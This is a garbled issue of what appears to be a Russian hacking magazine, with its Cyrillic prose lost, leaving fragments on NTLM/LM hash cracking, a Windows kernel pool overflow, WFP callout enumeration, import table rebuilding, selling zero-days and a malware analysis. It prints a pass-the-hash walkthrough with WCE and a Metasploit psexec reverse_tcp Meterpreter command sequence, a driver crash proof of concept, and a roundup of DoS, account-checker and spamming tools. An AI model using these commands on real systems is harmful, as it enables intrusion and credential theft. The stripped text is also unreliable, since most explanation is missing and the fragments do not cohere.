Sensepost 6
Perl BiLE-suite

Nessus

(sensepost.com/cms/resources/labs/tools/misc/BiLE-suite.tgz).
BiDiBLAH.
BiLE-suite ,
DNS. BiLE.pl BiLEweigh.pl.
, ,
link:, ,
. , ,
. BiLE-weigh
,
. ; ,
,
( ).
HTTrack (httrack.com/page/2/en/index.html).
HTTrack -, BiLE
, .
HTTrack Win, *nix. BiLE-suite , , .
, BackTrack4 .
, HTTrack:
#tar xvfz httrack-3.43-9C.tar.gz
#./configure && make && su -c 'make install'

045

, webhttrack ,
, .
BiLE-weigh.pl:
:
`cat temp | sort -r -t ":" +1 -n > @ARGV[1].sorted`;
:
`cat temp | sort -r -t ":" --key=2 > @ARGV[1].sorted`;

, $mc 67
BiLE.pl. , swf-,
, HTTrack Win.
BiLE backtrack-linux.org:
perl BiLE.pl www.backtrack-linux.org BT

www.backtrack-linux.org ;
BT .
, BT.mine BT.warus,
.
:
perl BiLE-weigh.pl www.backtrack-linux.org BT.mine

: NTLM/LM

:
. , . ?
:). , .
, Windows- LSA- SAM-.
, , Windows .
NTLM LM- . , MD4 DES- .
, LSA- SAM- ( )
.
, .
,
- DLL-, SeDebugPrivilege.
.

- .

, www.backtrack-linux.org

BT.mine.sorted. , :).

, NTLM, , . ,
(, ) .
. , Windows , pwdump, ,
NTLM- challenge, smb_sniff
Metasploita (. ). ?
,
-, Cain&Abel (oxid.it/cain.html).
, ( Cracker)
:
1) ;
2) ;
3) .

. LM-,
. , -, , . , -,
7 , .
, 14 .
, ,
.
. NTLM-,
. C LM-
:
, LM- ;
15 , LM-;

cp866.

, Cain
(. ):
;
;
.

046


,
Challenge. smb_relay challenge 1122334455667788.
, , (rainbow tables). ,
habrahabr.ru/blogs/algorithm/82941/, .
,
.
, ,
.

( ), , . rtgen.exe
RainbowCrack (project-rainbowcrack.com/index.htm),
winrtgen.exe Cain. , ,
.
RainbowCrack.
, , (salt) - (, , )
.
. ,
c . NTLM-,
NTLM+challenge-.

:
WINDOWS NTLM/
LM-

logon:
>wce.exe e
10 :
>wce.exe r10
:
>wce.exe o ntlms.txt

:
, .
, , , - .
, ,
. ,
, - . , .. ,
. , NTLM,
, . . .

:). , 1997 .
Pass The Hash. .
.
. Hernan Ochoa (oss.coresecurity.
com/pshtoolkit/doc/index.html hexale.blogspot.com) ,
Metasploit.
pshtoolkit WCE:
Windows Credentials Editor (www.ampliasecurity.com/research/wce_
v1.0.tgz).
.
, WCE.
NTLM/LM- .

/ , :
> wce.exe -s user:Victim:1F27ACDE849935B0AAD3B435B51404EE:579110C49145015C47ECD267657D3174 -c "c:\Program Files\Internet Explorer\iexplore.exe"

-s user,
Victim LM- NTLM-, - , ( ).
Metasploit, , .
pth:
msf>use exploit/windows/smb/psexec
IP :
msf>set PAYLOAD windows/meterpreter/reverse_tcp
msf>set LHOST 192.168.146.129
:
msf>set RHOST 192.168.0.101
, :
msf>set SMBUser
"LM:NTLM" :
msf>set SMBPass 1F27A.04EE:579.2676
:
msf>exploit

, :
>wce.exe l

Meterpreter.
z

Pass The Hash Metasploit Framework


047


CISS Research Team,

WINDOWS
KERNEL POOL OVERFLOW
,
,
. ,
,
, ,
, ,
, 0day-.

Memory Management
. , ,
, , .
,
safe unlinking.
, , ,
.
.
ms08-001 - IGMPv3 Kernel Pool Overflow
tcpip.sys;
ms09-006
wmf/emf, win32k.sys;
ms10-058 integer overflow ,
tcpip.sys.

, Windows (
, ) -

048

/ . ,
. Intel x86
4096 .
. ,
ExAllocatePoolWithTag ExFreePoolWithTag, .
,
. ,
.


Paged NonPaged pool

.
. , ,
(, ?). Paged pool
(swap). NonPaged pool ,
IRQL.
pagefile.sys paged-.
,

Vista.
paged-.

,

. Microsoft
, Windows, Paged- NonPaged-.
NonPaged pool,
Paged-Pool .
NonPaged pool
heap. Microsoft Windows
Internals.

NonPaged pool

. ,
.

. , Windows

. , . ,
.

.
.
NonPaged lookaside ,
,
256 . (PCR), IRQL, GDT, IDT.
(PCRB)
lookaside-.
Lookaside-

.
, (
Lookaside) , .
ExInterlockedPopEntrySList

WinDbg

lock. PPNPagedLookasideList
Lookaside-.
Lookaside-: P L. depth
GENERAL_LOOKASIDE ,
ListHead.
, .

P L. P depth , L, P
.

, . ,
4080 ,
lookaside- .
, POOL_DESCRIPTOR.
PoolVector
NonPagedPoolDescriptor.
,
ExpNonPagedPoolDescriptor 16
. PCRB
KNODE.
color,
ExpNonPagedPoolDescriptor. , .

ExpNumberOfNonPagedPools,
.
.
WinDbg POOL_DESCRIPTOR
(. ). spinlock' ; HAL

(pool descriptor).

. HAL
. NonPaged spinlock
(LockQueueNonPagedPoolLock). ,
spinlock.
, 4080 .
MmNonPagedPoolFreeListHead ,
.

NonPaged spinlock',
LockQueueNonPagedPoolLock.
ExFreePoolWithTag
.
.
MmNonPagedPoolFreeListHead.

HTTP://WWW
links
1. phrack.org/issues.
html?issue=65&id=4
2. Subverting VistaTM
Kernel For Fun And
Profit by Joanna
Rutkowska
invisiblethings.org/
papers/joanna%20rutkowska%20-%20subverting%20vista%20
kernel.ppt
3. Vista RC2 vs. pagefile attack by Joanna
Rutkowska
theinvisiblethings
blogspot.com/
2006/10/
vista-rc2-vs-pagefileattack-and-some.
html
4. Windows Heap
Overflows - David
Litchfield
blackhat.com/presentations/win-usa-04/
bh-win-04-litchfield/
bh-win-04-litchfield.
ppt

049


, , heap .

. , , .

(. ).


,
BugCheck' (, , BSOD'):
BAD_POOL_HEADER. ExFreePoolWithTag,
PreviousSize BlockSize
.
BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the
current request. This may or may not be due to the
caller. The internal pool links must be walked to
figure out a possible cause of
the problem,
and then special pool applied to the suspect tags or
the driver verifier to a suspect driver.
Arguments:
Arg1: 00000020, a pool block header size is corrupt.
Arg2: 812c1000, The pool entry we were looking for
within the page. <----
Arg3: 812c1fc8, The next pool entry. <----
,
Arg4: 0bf90000, (reserved)

DRIVER_CORRUPTED_EXPOOL.
ExFreePoolWithTag, unlink'e
Page Fault.
DRIVER_CORRUPTED_EXPOOL (c5)
An attempt was made to access a pageable (or
completely invalid) address at an
interrupt request level (IRQL) that is too high.
This is caused by drivers that have corrupted the
system pool. Run the driver verifier against any
new (or suspect) drivers, and if that doesn't turn
up the culprit, then use gflags to enable special
pool.
Arguments:
Arg1: 43434343, memory referenced <----- Blink'a
Arg2: 00000002, IRQL

050

POOL_DESCRIPTOR

Arg3: 00000001, value 0 = read operation, 1 = write


operation
Arg4: 80544d06, address which referenced memory

BAD_POOL_CALLER. ExFreePoolWithTag,
, , . () :

typedef struct _POOL_HEADER
{
    union
    {
        struct
        {
            USHORT PreviousSize : 9;
            USHORT PoolIndex : 7;
            USHORT BlockSize : 9;
            USHORT PoolType : 7;
        };
        ULONG32 Ulong1;
    };
    union
    {
        struct _EPROCESS* ProcessBilled;
        ULONG PoolTag;
        struct
        {
            USHORT AllocatorBackTraceIndex;
            USHORT PoolTagHash;
        };
    };
} POOL_HEADER, *PPOOL_HEADER;
// sizeof(POOL_HEADER) == 8

PreviousSize, BlockSize :
PreviousSize = (____
+ sizeof(POOL_HEADER)) / 8
BlockSize = (___
+ sizeof(POOL_HEADER)) / 8

PoolType , , nt!_LIST_ENTRY.
kd> dt nt!_LIST_ENTRY
+0x000 Flink : Ptr32 _LIST_ENTRY
+0x004 Blink : Ptr32 _LIST_ENTRY

,
,


MiFreePoolPages

,
C
,

>0xFF0

false

MemoryBlock

NewMemoryBlock

true

<=0x100

<0xFF0


MmNonPagedPoolFreeListHead

-
Poolindex POOL_HEADER,
, PoolDescriptor
;
-
LIST_ENTRY

, . unlink'a.
entry :
PLIST_ENTRY b,f;
f=entry->Flink;
b=entry->Blink;
b->Flink=f;
f->Blink=b;

4 :
*() =
*(+4) =

, .
.text:00016330  mov cx, [eax]              ; eax
.text:00016333  inc eax
.text:00016334  inc eax
.text:00016335  test cx, cx
.text:00016338  jnz short loc_16330
.text:0001633A  sub eax, edx
.text:0001633C  sar eax, 1
.text:0001633E  lea eax, [eax+eax+50h]     ; UNICODE + 0x50
.text:00016342  movzx edi, ax              ; , WORD
.text:00016345
.text:00016345 loc_16345:;
.text:00016345  movzx eax, di
.text:00016348  push ebx
.text:00016349  xor ebx, ebx
.text:0001634B  cmp eax, ebx
>0xFF0

depth
PPNPagedLookasideList
,

.text:0001634D  jz short loc_16359
.text:0001634F  push eax; -
.text:00016350  push ebx; (NonPaged)
.text:00016351  call ds:ExAllocatePool     ; chunk'a
.text:00016357 mov ebx, eax
[..]
.text:000163A6 movzx esi, word ptr [edx]
.text:000163A9 mov [eax+edx], si
;
.text:000163AD inc edx
.text:000163AE inc edx
.text:000163AF test si, si
[..]
.text:000163F5 push ebx; P
.text:000163F6 call sub_12A43
.text:00012A43 sub_12A43 proc near
; CODE XREF: sub_12C9A+5Cp
.text:00012A43
.text:00012A43 P = dword ptr 4
.text:00012A43
.text:00012A43 cmp esp+P], 0
.text:00012A48 jz short locret_12A56
.text:00012A4A push 0; Tag
.text:00012A4C push [esp+4+P]; P
.text:00012A50 call ds:ExFreePoolWithTag
; , write4
C-
len = wcslen(attacker_controlled);
total_len = (2*len + 0x50);
size_2_alloc = (WORD)total_len; // integer wrap!!!
mem = ExAllocatePool(NonPagedPool, size_2_alloc);
....
wcscpy(mem, attacker_controlled); //
...

[Figure labels: Number of Bytes; <0x100; (<0xFF0)&(>0x100); MiAllocatePoolPages; PPNPagedLookasideList]



:)
ExFreePool(mem); // , , ,
, ,
,
ring0-shellcode

, , , -
. ,
- 0xffff .
BSoD
hDevice = CreateFileA("\\\\.\\KmxSbx",
GENERIC_READ|GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
0,
NULL);
inbuff = (char *)malloc(0x1C000);
if(!inbuff)
{
printf("malloc failed!\n");
return 0;
}
memset(inbuff, 'A',0x1C000-1);
memset(buff+0x11032, 0x00, 2);
//end of unicode, size to allocate 0xff0
ioctl = 0x88000080;
first_dword = 0x400;
memcpy(buff, &first_dword, sizeof(DWORD));
DeviceIoControl(hDevice, ioctl, (LPVOID)inbuff,
0x1C000, (LPVOID)inbuff, 0x100, &cb,NULL);

, . ,
( ) ( 0xffff), ExFreePoolWithTag (, ,
):

Arg4: 00000000, (reserved)


eax=00029fa8 ebx=fe8a7008 ecx=00000008 edx=fe880058 esi=00004141 edi=fe87d094
eip=f0def3a9 esp=f0011b78 ebp=f0011bac iopl=0 nv up ei pl nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206
KmxSbx+0x63a9:
f0def3a9 66893410 mov word ptr [eax+edx],si ds:0023:fe8aa000=???? <---- ,

, - ,
( BSoD).

: N , DeviceIoControl, ,
- N
(0xff0 ) , ,
Page Fault (PAGE_FAULT_IN_NONPAGED_AREA).

DVD.

,
Kernel Pool Overflow. ,
, -
, , , BSoD.
,
, , .
Kernel Pool Overflow, , ,
:). Stay tuned! z

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: fe8aa000, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: f0def3a9, If non-zero, the instruction address which referenced the bad memory address.

[Figure: Kernel Pool Overflow. Labels: Our chunk; Header; Overflow; Chunk we overflow; Next; Header; List Entry; Potential list entry depending on chunk type]



r0064 r0064@mail.ru

WFP

Windows
Filtering Platform
WFP, Windows Vista,
(
). ,

.
WFP,
.

. Callout WFP .
, callout: classifyFn, notifyFn,
flowDeleteFn (. FWPS_CALLOUT).
classifyFn ( ): , , , / . notifyFn ( )
. -


. FwpsCalloutRegister,
32- .
, , .
WinDbg,
Windows Vista x64, Ida Pro,
. ()
.reload /s /n. ,
WFP,

ipsblock!FlClassify ;->
NETIO!ArbitrateAndEnforce+0x3b0
NETIO!KfdClassify+0x8f1
tcpip!WfpAleClassify+0x47
tcpip! ?? ::FNODOBFM::'string'+0x178d3
tcpip!WfpAleAuthorizeConnect+0x2ef
tcpip!TcpCreateAndConnectTcbWorkQueueRoutine+0x4a2
tcpip!TcpCreateAndConnectTcb+0x48a
tdx!TdxConnectConnection+0x4e6
tdx!TdxTdiDispatchInternalDeviceControl+0x158

enuma
. callout ( , ,
callout).
Call Stack
( WinDbg <Alt+6>
), ,
. ,
. Call
Stack.

links

Windows Filtering Platform MS: msdn.microsoft.com/en-us/library/aa366510(VS.85).aspx

NETIO!ArbitrateAndEnforce (
).
.
fffffa60`00b9e9ef add rbp,rbp
fffffa60`00b9e9f2 lock xadd dword ptr [r12+rbp*8+80h],eax
fffffa60`00b9e9fc cmp qword ptr [r12+80h],r9
fffffa60`00b9ea04 jne NETIO! ?? ::FNODOBFM::'string'+0x6719
fffffa60`00b9ea0a mov rax,qword ptr [NETIO!gWfpGlobal]
fffffa60`00b9ea11 cmp ebx,dword ptr [rax+970h] ; max count
fffffa60`00b9ea17 jae NETIO! ?? ::FNODOBFM::'string'+0x6785
fffffa60`00b9ea1d imul rbx,rbx,38h
fffffa60`00b9ea21 add rbx,qword ptr [rax+978h] // add callout base
fffffa60`00b9ea28 cmp dword ptr [rbx],0 // callout?
fffffa60`00b9ea2b je NETIO! ?? ::FNODOBFM::'string'+0x6785

ipsblock!FlNotify ;->
NETIO!FeNotifyFilter+0x3a
NETIO!HandleFilterFree+0x1f
NETIO!DeleteFilterFromIndex+0x22b
NETIO! ?? ::FNODOBFM::`string'+0x6f03
NETIO!IoctlKfdCommitTransaction+0x39

, .
FeNotifyFilter. , :
fffffa60`00bac100 sub rsp,20h
fffffa60`00bac104 mov rbx,rdx
fffffa60`00bac107 mov rdi,rcx
fffffa60`00bac10a lea rdx,[rsp+38h]
fffffa60`00bac10f mov ecx,dword ptr [rbx+2Ch]
fffffa60`00bac112 mov esi,r8d
fffffa60`00bac115 call NETIO!FeGetRefCallout (fffffa60`00ba3060)
fffffa60`00bac11a mov r8,rbx
fffffa60`00bac11d mov rbx,qword ptr [rsp+38h] ;
fffffa60`00bac122 mov rdx,rdi
fffffa60`00bac125 mov ecx,esi
fffffa60`00bac127 call qword ptr [rbx+10h] ; ipsblock!FlNotify
fffffa60`00bac12a test eax,eax

...
fffffa60`00b9eacb lea rax,[rsp+78h]
fffffa60`00b9ead0 mov rdx,r15
fffffa60`00b9ead3 mov qword ptr [rsp+28h], rax
fffffa60`00b9ead8 mov qword ptr [rsp+20h], r12
fffffa60`00b9eadd call qword ptr [rbx+8]

,
. ,
callout
NETIO!gWfpGlobal
.

call-stack WinDbg

.
(FlClassify).
:


WFP msdn

ebx
.
, ebx
,
fffffa60`00b9ea11.
, ? ,
,
callout
32- ?
,
ebx. ,
- , dword ptr
[rax+970h]

( 0x11e). ebx
,
,
(
imul rbx,rbx,38h) 0x38
. qword ptr
[rax+978h]

(
WFP wdk
-).

. gWfpGlobal ( dq poi(netio!gWfpGlobal) WinDbg).
typedef struct _FW_CALLOUT_OBJECT
{
    ULONG64 uFlag;
    ULONG64 uClassifyFunction;
    ULONG64 uNotifyFunction;
    ULONG64 uFlowDeleteFunction;
    //ULONG64 uReserved[3];
}FW_CALLOUT_OBJECT,*PFW_CALLOUT_OBJECT;
#define CALLOUT_OBJECT_SIZE 0x38
....
VOID PrintCallouts6(ULONG64 gWfpGlobal)
{
    ULONG uMaxCount;
    ULONG64 uCalloutBase;
    PFW_CALLOUT_OBJECT pCurrentCallout;
    CHAR ModuleName[10]={0};
    // callout base: qword at gWfpGlobal+0x978
    uCalloutBase = *(PULONG64)(gWfpGlobal+0x978);
    // max count: dword at gWfpGlobal+0x970
    uMaxCount = *(PULONG)(gWfpGlobal + 0x970);
    FLOUT(DPFLTR_IHVDRIVER_ID,
          DPFLTR_ERROR_LEVEL,
          "Max id count %u\n",
          uMaxCount);
    // walk the callout array, one 0x38-byte entry per slot
    for(ULONG i=0;i<uMaxCount;i++)
    {
        pCurrentCallout = (PFW_CALLOUT_OBJECT)
            (uCalloutBase + i*CALLOUT_OBJECT_SIZE);
        // a zero flag marks an unused slot
        if(pCurrentCallout->uFlag)
        {
            FLOUT(DPFLTR_IHVDRIVER_ID,
                  DPFLTR_ERROR_LEVEL,
                  "Current callout 0x%I64X\n",
                  (ULONG64)pCurrentCallout);
            FLOUT(DPFLTR_IHVDRIVER_ID,
                  DPFLTR_ERROR_LEVEL,
                  " Notify routine 0x%I64X\n Classify routine 0x%I64X\n Flow delete function 0x%I64X\n",
                  pCurrentCallout->uNotifyFunction,
                  pCurrentCallout->uClassifyFunction,
                  pCurrentCallout->uFlowDeleteFunction);
            // ,
            GetModuleName(ModuleName,
                          8,
                          pCurrentCallout->uClassifyFunction);
            FLOUT(DPFLTR_IHVDRIVER_ID,
                  DPFLTR_ERROR_LEVEL,
                  " Module name = %s\n",
                  ModuleName);
            RtlZeroMemory(ModuleName,sizeof(ModuleName));
        }
    }
}

, .
FW_CALLOUT_
OBJECT. GetModuleName ,
.
ZwQuerySystemInformation(... SystemModuleInformation...) ,
, ,
:).
, ,
, . , . ,
, , ,
, , WinDbg, u .
Notify routine 0xFFFFFA6000E113B0
Classify routine 0xFFFFFA6000E35070
Flow delete function 0x0
Module name = tcpip.sys
...
kd> u 0xFFFFFA6000E113B0 ;-> tcpip.sys?
tcpip!IPSecAleConnectCalloutNotify:
fffffa60`00e113b0 33c0 xor eax,eax
kd> u 0xFFFFFA6000E35070 ;-> tcpip.sys?
tcpip!IPSecInboundTransportFilterCalloutClassifyV4:
fffffa60`00e35070 488bc4 mov rax,rsp

, .

Vista Windows 7

Windows 7, , ( -!). , WFP


.
netio!ProcessCallout:
.text:000000000001C680 ProcessCallout proc near ; CODE XREF: ArbitrateAndEnforce+2A457
...
.text:000000000001C71D mov rax, cs:gWfpGlobal
.text:000000000001C724 cmp ebx, [rax+548h] // max count
.text:000000000001C72A jnb loc_2D270
.text:000000000001C730 mov rdi, rbx
.text:000000000001C733 shl rdi, 6 // callout size
.text:000000000001C737 add rdi, [rax+550h] // callout base
.text:000000000001C73E cmp [rdi+4], esi
.text:000000000001C741 jz loc_2D270
...
.text:000000000001C7E6 mov r10, [rdi+10h]
.text:000000000001C7EA mov rbx, qword ptr [rsp+118h+arg_30.LockState]
.text:000000000001C7F2 mov r8, [rsp+118h+arg_18]
.text:000000000001C7FA mov rcx, [rsp+118h+arg_8]
.text:000000000001C802 mov rdx, rbp
.text:000000000001C805 cmp [rdi], esi
.text:000000000001C807 jz loc_2D56F
.text:000000000001C80D mov [rsp+118h+var_E8], rbx
.text:000000000001C812 mov r9, r13
.text:000000000001C815 mov [rsp+118h+var_F0], r14
.text:000000000001C81A mov [rsp+118h+var_F8], rax
.text:000000000001C81F call r10 // Classifyfn

, gWfpGlobal
WFP Win7, Vista. 0x40 (shl rdi, 6, * 2^6),
callout base ([rax+550h]) . enum
Win7 for fun :).
netio GetCalloutEntry, :
.text:000000000001CE30 GetCalloutEntry proc near ; CODE XREF: FeGetRefCallout+2057
.text:000000000001CE30                           ; FeGetCalloutFlowDelete+28 ...
.text:000000000001CE30
.text:000000000001CE30 ; FUNCTION CHUNK AT .text:0000000000028954 SIZE 0000000B BYTES
.text:000000000001CE30
.text:000000000001CE30 mov rax, cs:gWfpGlobal
.text:000000000001CE37 cmp ecx, [rax+548h] // max count
.text:000000000001CE3D jnb loc_28954
.text:000000000001CE43 mov rax, [rax+550h] // callout base
.text:000000000001CE4A mov ecx, ecx
.text:000000000001CE4C shl rcx, 6 // callout object size
.text:000000000001CE50 add rcx, rax
.text:000000000001CE53 mov [rdx], rcx
.text:000000000001CE56 cmp dword ptr [rcx+4], 0
.text:000000000001CE5A jz loc_28954
.text:000000000001CE60 rep retn
.text:000000000001CE60 GetCalloutEntry endp

, , WFP, . WFP, .
WFP WDK,

. z



Norseev@gmail.com



.
.
. , , ,
(
) , .
?
,

( ,
): - ,
OEP, ,
!
. ,
ImpRec, , (, ). ,
ImpRec (, , - ) , , ,
.
. ? ? ,
( ), . ,
(, Hex PE-).


( ) DataDirectory. (
RVA-) 80h
PE- .
IMAGE_IMPORT_DESCRIPTOR, :
struct IMAGE_IMPORT_DESCRIPTOR {
    union {
        DWORD Characteristics;
        DWORD OriginalFirstThunk;
    };
    DWORD TimeDateStamp;
    DWORD ForwarderChain;
    DWORD Name;
    DWORD FirstThunk;
};

FirstThunk

IMAGE_IMPORT_
DESCRIPTOR, .

:
Name ;
FirstThunk IMAGE_THUNK_
DATA32.
.
IMAGE_THUNK_DATA32 :
struct IMAGE_THUNK_DATA32 {
    union {
        DWORD ForwarderString;
        DWORD Function;
        DWORD Ordinal;
        DWORD AddressOfData;
    } u1;
};


(
). .
PE-,
IMAGE_IMPORT_DESCRIPTOR, ( Name)
FirstThunk (
, ,
). ( ,
) .
FirstThunk API-.

,
,

exe-. ?
,
. ThunkValue?
.
: ,
FirstThunk
, , .
FirstThunk
( ) , .
?
:
1) DataDirectory ;.
2) IMAGE_IMPORT_DESCRIPTOR FirstThunk;.
3) FirstThunk, ,
, ,
, (
),
access violation,

.
,
FirstThunk. ,
, () , ,
.


,
FirstThunk. ,
:
(, ,
DataDirectory), (- ).
? -,
; , ,
,
GetMessage, DispatchMessage, CreateWindow .. (
). -,

. ,
.
( ) .
:
, (


7Eh 4h FirstThunk

API-

, ). 99,9 %
, ,
HEX-. ,
. ,
.

FirstThunk
. , PE-
.
. , ASLR
, ASLR . RVA 01000000h,
.
. :
1) (
).
2)
(, user32 7Eh).
3) ;
4h
FirstThunk.
: API-?. , . : - ,
A, B, C. , C, ,
, B. API- ,
-
.
,
, .
FirstThunk . ,
API- ,
, jmp
( , ,
FirstThunk).
.
FirstThunk
.
, , .
. :
1) .



,
;.
2) , .
API-
( ),
FirstThunk. ,
. . ,
FirstThunk (
), .
3) , ,
. .

, , ( ,
IMAGE_IMPORT_DECRIPTOR
) .
,
. 2040h (
FirstThunk). Ch (
IMAGE_IMPORT_DESCRIPTOR, ). 204Ch kernel32.dll (
). 4
FirstThunk
kernel32 ( 2000h).
FirstThunk (, ,
, ).
GetModuleHandleA,
5009h, 2, 5007h. FirstThunk.
.
(, , ). , . ,
IMAGE_IMPORT_DESCRIPTOR (
FirstThunk ), N
, (N+1)*14h .

DataDirectory
.

. , , (
).

? ,
,

FirstThunk

, ,
. ,
. z

,
API-
(,
), .
,

. LordPE.
,
Resource Binder,
.

LordPE RVA



, Digital Security a.sintsov@dsec.ru



,
-, Android
.. .. ,
, -. ,
, , ,
.

,
. ,
, ,
, , , ,
, ,
, ,


(, ). ,
, ,

PCI DSS, , , .

. ,

, - -. ,
,
, :).

- ( ):
1. // - - .
-. , - ,
, . - . , - ,
, --. ,
:).
( ),
. ,
(

, , , ).
2. -.
1 ,
:). -
-, ,
/ (0day) - $$$.
, .
, , ; ,
...
3. .
,
- .
.
IDS/IPS-,
- . , ,
,
PR ( ) .
, ,
.
, ,
3, .

0day

, 0day.
,
. ,
unsecurityresearch.com. ,
0day- 1000/2000 . ,
30000 . ,
. , , ZDI (Zero
Day Initiative zerodayinitiative.com),
.
, ZDI ,

- ZDI
, ( ).
, ZDI ( , TippingPoint, ZDI) PWN to OWN CanSecFest,
.
.

ZDI

TippingPoint
3COM ( , , Hewlett-Packard) IPS, 0day-.
IPS , . ,
ZDI
. , , ZDI
-
. , 0day- ZDI,
TippingPoint
. , ,
.
.
, -

273
, .
, ,
, ZDI
. , PoC-, , ,
, ( , ,
).

NSS -
- -. -0day- Metasploit. , ,
, .

, ,
; ZDI , iDefense
labs.idefense.com, SecuriTeam securiteam.com NetraGard
netragard.com. , FireFox
Google Chrome . ,
, code execution ZDI.


...

, . ,
,
. ][ ActiveX-. ,
- , , . , . ZDI ,
:

, ...
Register. ! e-mail, . , ,
Referal. ,
:). 0day, , , ,
, 2500 ( ),
asintsov,
:). , .
My Account .
My Profile. ,
, . ,
, , , , ,
, ZDI . ,
, - , PGP-
e-mail' ZDI. , , e-mail'.
.
Copy of Government
Issued ID. , PDF-, , ,
( ) .
zdi@3com.com,
https://www.zerodayinitiative.com/documents/zdi-pgp-key.asc ( , ).
, ,
, .
,
. : Western Union, .
WU , ,
. ;
(, ), , SWIFT . ,
. . ,
,
. ,
,
, .

,
,

, XSS-, LFI- SQL-


. , ,
,
. FTP/-,
, , , ActiveX
, ..
, ,
, .
, , ... . , . ,
. Crash-PoC
,
.
, ZDI , ,
. ,
, , .
, ,
.

1.
( ),
ZDI. . ,
. zerodayinitiative.com,
.
Researcher Login. , -


, . ,
, , , .

2.
, ,
, ? Open
Case . ,
. ,
,
(, ),
(, - ..). ,
, , . ,
, ,
. e-mail'
- -,

. . ,
, , , .
My Cases ,
, .
My Cases
-
, , ,
,
, ZDI.

.
ZDI.
2500 , 2500 ,
.

. ? , , 10000 ,
, 20000 ,
35000 , , 50 000 . ,
@WTFuzz .
,

. .
:
+10%

$1000


. ,
, :)

:
+15%

+25%
$5000
( + )
DEFCON -

:
+20%

+50%
$10000
( + )
BlackHat DEFCON -

:
+25%

+100%
$20000
( + )
BlackHat DEFCON - +
BlackHat

, . ,
, .
ActiveX-,
COMRaider', 2500 3000 .
,
. ZDI .
...

- , ZDI. - , ,
/-/ ,
, ZDI . , . ! z



icq 884888, http://snipper.ru

X-TOOLS
,

Sourceforge hyenae.sourceforge.net.

: Puff
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Cosimo Oliboni

!
, Puff
members.fortunecity.it/blackvisionit/PUFFV200.HTM.


,
-
(
).
?
,
zip-,
:). !
,
,
Puff. , Puff
,

.
Puff
:
(BMP, JPG, PCX, PNG, TGA);
(AIFF, MP3, NEXT/SUN, WAV);
(3GP, MP4, MPG, VOB);
(FLV, SWF);
,
(EXE, DLL).

:
, ,
(CAST-256, IDEA-NXT, SAFER,
RIJNDAEL, MARS, RC6, SERPENT, TWOFISH
).
:
;
(512-
);

512 ;
;
.


: Hyenae
: *nix/win
: Robin Richter



:). , Hyenae
, Ethernet (MITM, DoS DDoS).


.
, ,
, IP .

:

ARP-Request ;
ARP-Cache ;
PPPoE-;
PPPoE-;
ICMP-Echo ;
ICMP-Smurf ;
TCP- ICMP;
TCP-SYN ;
TCP-Land ;
TCP-;
UDP-;
DNS-Query ;
DHCP-Discover ;
DHCP ;
DHCP-Release;
Cisco HSRP active .

Hyenae
IPv4/IPv6,
,
, ,
.

: CmosPwd
: *nix/win
: Christophe Grenier


BIOS.


CmosPwd,
, cmos
BIOS SETUP.
BIOS':
ACER/IBM BIOS;
AMI BIOS;
AMI WinBIOS 2.5;
Award 4.5x/4.6x/6.0;
Compaq (1992);
Compaq (New version);
IBM (PS/2, Activa, Thinkpad);
Packard Bell;
Phoenix 1.00.09.AC0 (1994), a486 1.03,
1.04, 1.10 A03, 4.05 rev 1.02.943, 4.06
rev 1.13.1107;
Phoenix 4 release 6 (User);
Gateway Solo - Phoenix 4.0 release 6;
Toshiba;
Zenith AMI.


, ,
/
cmos.
CmosPwd:
cmospwd.exe [/d] // cmos ascii +

cmospwd.exe [/d] /[rlw] cmos__
////
cmos
cmospwd.exe /k // cmos
cmospwd.exe /m[01]* //


cgsecurity.org/cmospwd.txt,
cgsecurity.org/wiki/CmosPwd.

: DSGood Checker
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: NightEagle




DSGood Checker.

/
:
1. ( :
ip:login;pass);
2. (
);
3. ;
4. ;
5.
.
:
;
;
.NET Framework
3.5;
- ;
,
;
.


forum.
asechka.ru/showthread.php?t=120148.

: The spamer from


Reliable
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Reliable

,
.
: ,
e-mail -.
:
e-mail;
;
e-mail-;
;
(
mail-);
;
;


;

;

;
SMTP-;
(, , );
;
(
);
.Net Framework 2.0.

SMTP-
(
smtp.ini):
smtp.mail.ru, smtp.inbox.ru, smtp.
bk.ru, smtp.list.ru, smtp.yandex.ru,
smtp.rambler.ru, smtp.hotmail.com,
smtp.gmail.com


: icq-email-vkontakte.ru/forum/
showthread.php?t=4788.
P.S. , !

.

: Poker Checker
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: DDM


Poker Checker.
(
Windows-) / -,
:).


,
Poker
.

:
fulltiltpoker.com, pokerstars.
com, partypoker.com, titanpoker.
com, pacificpoker.com, redstarpoker.

Windows XP
com, leonpoker.com, noblepoker.com,
williamhillpoker.com, heypoker.com

,
5 7 ,

.

: Half-open limit fix


(patch) for Windows
: Windows XP
: half-open.com


,
Windows XP / Half-open limit fix.


TCP-
(half-open connections connection attempts)
tcpip.sys.

Microsoft SP2 (Service Pack 2)
Windows XP.
, DoS-.
, 10 .
.

.
Half-open limit fix ,
.
, 100. z


MALWARE
, Senior Malware Analyst, Heuristic detection group, Kaspersky Lab

Trojan-Clicker.Win32.
Whistler -

Trojan-Clicker.Win32.
Whistler.a. , .
.
.

, ,
.
. PE-,
Microsoft Visual Studio 5.0 ( GUI).
, ,
. .rdata .
Whistler
VMWare RedPill.
.
(Ring 3) in
,
.
, , API VirtualAlloc , . CreateThread
.
WaitForSingleObject.
, , ,
, , .
, .. ,
Process Explorer
FindWindowW("PROCMON_WINDOW_CLASS"),
TrueCrypt


TrueCrypt, CreateFileW("\\\\.\\
TrueCrypt", ). .
, ,
.


BIOS .
CR0, EDX, EFlags, IP.
IP FFF0h, BIOS, , ..
CS 0xF000. ,
( , 0xAA55 ),
7C00h.
.
, , .
200h ,
, .
: , ,
? , , , MBR (Master
Boot Record). 512 . MBR
, ,

MBR, 0x200 AA55

         0x1BE
0x1BE    0x10    #1
0x1CE    0x10    #2
0x1DE    0x10    #3
0x1EE    0x10    #4
0x1FE            0xAA55

1. MBR
2


MBR
0xAA55 . . MBR
(. 1).
MBR,
.
( 2).
